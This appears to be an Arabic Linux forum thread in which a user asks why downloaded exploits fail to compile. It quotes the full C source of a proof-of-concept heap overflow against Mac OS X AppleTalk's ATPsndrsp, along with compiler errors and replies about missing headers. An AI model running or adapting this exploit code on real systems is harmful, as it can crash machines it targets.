إعـــــــلان

تقليص
لا يوجد إعلان حتى الآن.

الاستفادة من الـ exploits؟

تقليص
X
 
  • تصفية - فلترة
  • الوقت
  • عرض
إلغاء تحديد الكل
مشاركات جديدة

  • الاستفادة من الـ exploits؟

    السلام عليكم ورحمة الله

    اعتذر اذا كانت ممنوعه مثل هذي المواضيع لكن حاب اسال..

    اليوم جربت اكثر من exploits
    ولا واحد فيهم ظبط..الكل فيهم اخطاء!

    الخطا من عندي او من الكود نفسه لان الصراحة جربت الكثير وبدات اشك بنفسي ...

  • #2
    يمكن انك جربت exploit قديمة تم رقع النظام ضدها فلم تعد تشكل اي valnurability
    V.I.P

    (وَاصْبِرْ فَإِنَّ اللَّهَ لَا يُضِيعُ أَجْرَ الْمُحْسِنِينَ)
    هود 115

    Linux is user-friendly, but it happens to be selective about its friends

    "احذر أن تكون مثل البقية تأخذ وﻻتعطي ، فلن يكون هناك مصادر تعليمية على الشبكة، ﻻأكثر الله من أمثالهم"


    مجتمع لينوكس العربي: وقف لله تعالى وصدقة جارية، فلا بارك الله في كل من يحاول الإساءة إليه في الظاهر أو في الخفاء...


    تعليق


    • #3
      طيب اخي الكريم

      ع سبيل المثال
      هذا الاكود او اي كود المهم يكون سي++ لان الكمبايلر موجود عندي

      طريقة ترجمة الامر كالتالي
      كود:
      [[email protected] ~]$ cd hacker
      [[email protected] hacker]$ g++ 3.cpp 3
      g++: 3: No such file or directory
      3.cpp:12:24: error: sys/sockio.h: No such file or directory
      3.cpp:13:29: error: netat/appletalk.h: No such file or directory
      3.cpp:36:2: warning: no newline at end of file
      3.cpp: In function ‘int main(int, char**)’:
      3.cpp:23: error: invalid conversion from ‘void*’ to ‘char*’
      3.cpp:30: error: ‘ATPsndrsp’ was not declared in this scope
      يعني معقولة كل الناس تكتب باخطا..!

      تعليق


      • #4
        على ما يبدو في عندك نقص بمكتبات libraries الخاصة بالسي ، لذلك يخرج لك ال error
        V.I.P

        (وَاصْبِرْ فَإِنَّ اللَّهَ لَا يُضِيعُ أَجْرَ الْمُحْسِنِينَ)
        هود 115

        Linux is user-friendly, but it happens to be selective about its friends

        "احذر أن تكون مثل البقية تأخذ وﻻتعطي ، فلن يكون هناك مصادر تعليمية على الشبكة، ﻻأكثر الله من أمثالهم"


        مجتمع لينوكس العربي: وقف لله تعالى وصدقة جارية، فلا بارك الله في كل من يحاول الإساءة إليه في الظاهر أو في الخفاء...


        تعليق


        • #5
          المشاركة الأصلية بواسطة greyhunter مشاهدة المشاركة
          على ما يبدو في عندك نقص بمكتبات libraries الخاصة بالسي ، لذلك يخرج لك ال error
          هلا..توني استوعب موضوع..

          كود:
          #include <stdlib.h>
          #include <unistd.h>
          #include <string.h>
          #include <stdio.h>
          #include <fcntl.h>
          #include <stdarg.h>
          #include <sys/param.h>
          #include <sys/socket.h>
          #include <sys/ioctl.h>
          #include <sys/sockio.h>
          #include <netat/appletalk.h>
          
          int main(int argc, char **argv) {
                  int fd, retv, i;
                          unsigned int a, b;
                          char *powder;
          
                  if ((fd = socket(AF_APPLETALK, SOCK_RAW, 0)) < 0)
                          exit(1);
                          
                          powder = malloc(6000);
                          memset(powder, 0x41, 5999);
          
                          for (i=0; i < 7000; i++) {
                                  a = strlen(powder) - i;
                                  b = i;
                                  printf("[email protected]%p a=%u b=%u\n", powder, a, b);
                                  retv = ATPsndrsp(fd, (unsigned char *)powder, a, b);
                          }
                          
                  close(fd);
                          free(powder); // won't reach this unless appletalk is disabled
                          return 0;
          }
          هذا هو 3.cpp

          ممكن المشكله عندي بملفات الراس
          كود:
          #include <stdlib.h>
          #include <unistd.h>
          #include <string.h>
          #include <stdio.h>
          #include <fcntl.h>
          #include <stdarg.h>
          #include <sys/param.h>
          #include <sys/socket.h>
          #include <sys/ioctl.h>
          #include <sys/sockio.h>
          #include <netat/appletalk.h>
          انها غير متواجده بنفس المجلد..الاستنتاج الي وصلت له صحيح او خطا؟
          مثلا اذا كانت موجوده راح يشتغل؟

          تعليق


          • #6
            بالضبط... ملفات الheader يجب ان تكون موجودة لكي يطبق الfunctions التي بداخلها
            V.I.P

            (وَاصْبِرْ فَإِنَّ اللَّهَ لَا يُضِيعُ أَجْرَ الْمُحْسِنِينَ)
            هود 115

            Linux is user-friendly, but it happens to be selective about its friends

            "احذر أن تكون مثل البقية تأخذ وﻻتعطي ، فلن يكون هناك مصادر تعليمية على الشبكة، ﻻأكثر الله من أمثالهم"


            مجتمع لينوكس العربي: وقف لله تعالى وصدقة جارية، فلا بارك الله في كل من يحاول الإساءة إليه في الظاهر أو في الخفاء...


            تعليق


            • #7
              بيض الله وجهك بياض لا يسود..

              اشكرك اخي الكريم...

              تعليق


              • #8
                أخي لا يشترط تواجدها في نفس المجلد و لكن يوجد مجلد في النظام توجد فيه هذه المكتبات إن كانت مثبتة و أظن هو /usr/include/
                إن كنت تعمل على توزيعية ديبيانية ثبت حزمة build-essential
                User N4m3 | FLoOoD HacKeR
                e-mail | e@Hotmail.com | zo@Hotmail.com
                ZoNe-H
                FaceBook

                تعليق


                • #9
                  هلا امين..

                  استخدم توزيعة فيدورا..لو كنت تعرف المسار تسوي خير...

                  تعليق


                  • #10
                    السلام عليكم
                    اذا ما فيه ازعاج ، هل بالامكان شرح البرنامج - اذا كان عندك اخي الوقت و الرغبة ^_^
                    مشكور.

                    تعليق


                    • #11
                      نعم إخواني إشرحولنا هذ ا الشيء فيدونا الله يزيدكم من علمه




                      تعليق


                      • #12
                        والله لست متأكدا مئة بالمئة و لكن ما فهمته تقريبا انه يعمل شيء شبيه ل buffer overflow ... او kernel panic و اعتقد ايضا انه يستخدم AppleTalk الخاص بأجهزة ال MAC لوجود هيدر في اعلى البرنامج . ننتظر الأخ FHD ليؤكد الموضوع لأنه الاعلم بهذا الكود و ماذا يفعل.
                        V.I.P

                        (وَاصْبِرْ فَإِنَّ اللَّهَ لَا يُضِيعُ أَجْرَ الْمُحْسِنِينَ)
                        هود 115

                        Linux is user-friendly, but it happens to be selective about its friends

                        "احذر أن تكون مثل البقية تأخذ وﻻتعطي ، فلن يكون هناك مصادر تعليمية على الشبكة، ﻻأكثر الله من أمثالهم"


                        مجتمع لينوكس العربي: وقف لله تعالى وصدقة جارية، فلا بارك الله في كل من يحاول الإساءة إليه في الظاهر أو في الخفاء...


                        تعليق


                        • #13
                          المشاركة الأصلية بواسطة fakir مشاهدة المشاركة
                          السلام عليكم
                          اذا ما فيه ازعاج ، هل بالامكان شرح البرنامج - اذا كان عندك اخي الوقت و الرغبة ^_^
                          مشكور.
                          وعليكم السلام..

                          الصراحة الاختيار كان عشوائي للثغرة لان كنت ابحث عن اي ثغرة بالسي++ او السي ووجدت هذي

                          الثغرة من نوع Buffer Overflow
                          في Mac OS X AppleTalk ATPsndrsp Heap

                          رابط الثغرة
                          http://www.securiteam.com/exploits/5MP0B1FKAQ.html

                          تعليق


                          • #14
                            المشاركة الأصلية بواسطة knoppix_dark مشاهدة المشاركة
                            نعم إخواني إشرحولنا هذ ا الشيء فيدونا الله يزيدكم من علمه
                            ربك يـــــــــــــــــــــــسهل...

                            تعليق


                            • #15
                              والله هاي طلعت بفهم و انا مش عارف :rofl: :p :onfire: :rofl: :flabbergasted: :onfire: :rofl: :p
                              V.I.P

                              (وَاصْبِرْ فَإِنَّ اللَّهَ لَا يُضِيعُ أَجْرَ الْمُحْسِنِينَ)
                              هود 115

                              Linux is user-friendly, but it happens to be selective about its friends

                              "احذر أن تكون مثل البقية تأخذ وﻻتعطي ، فلن يكون هناك مصادر تعليمية على الشبكة، ﻻأكثر الله من أمثالهم"


                              مجتمع لينوكس العربي: وقف لله تعالى وصدقة جارية، فلا بارك الله في كل من يحاول الإساءة إليه في الظاهر أو في الخفاء...


                              تعليق

                              يعمل...
                              X